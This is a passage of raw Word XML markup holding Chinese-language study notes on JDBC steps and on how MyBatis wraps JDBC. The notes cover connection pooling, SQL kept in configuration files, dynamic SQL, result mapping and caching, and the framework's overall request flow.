        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句并获得查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对查询结果进行转换处理并将处理结果返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>释放相关资源（关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ResultSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的优化和封装：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用数据库连接池对连接进行管理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句统一存放到配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句变量和传入参数的映射以及动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句的处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对数据库操作结果的映射和结果缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00396CC0" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00396CC0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句的重复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00DD6166" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、总体流程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="000B3559" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载配置并且初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00377723" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置来源于配置文件和</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的注解，将</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置信息加载成为一个</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入参数映射、执行</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，结果映射</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储在内存中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收调用请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发条件：调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入参数：为</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和传入参数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求传递给处理层处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00C4349A" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00345711">
        <w:t>触发条件：</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00C47FB9">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00C47FB9">
        <w:t>接口层传递请求过来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>      </w:t>
      </w:r>
      <w:r w:rsidRPr="00345711">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345711">
        <w:t>传入参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>：为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FB9">
        <w:t>和传入参数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00C47FB9" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r w:rsidRPr="00C47FB9">
        <w:t>      </w:t>
      </w:r>
      <w:r w:rsidRPr="00345711">
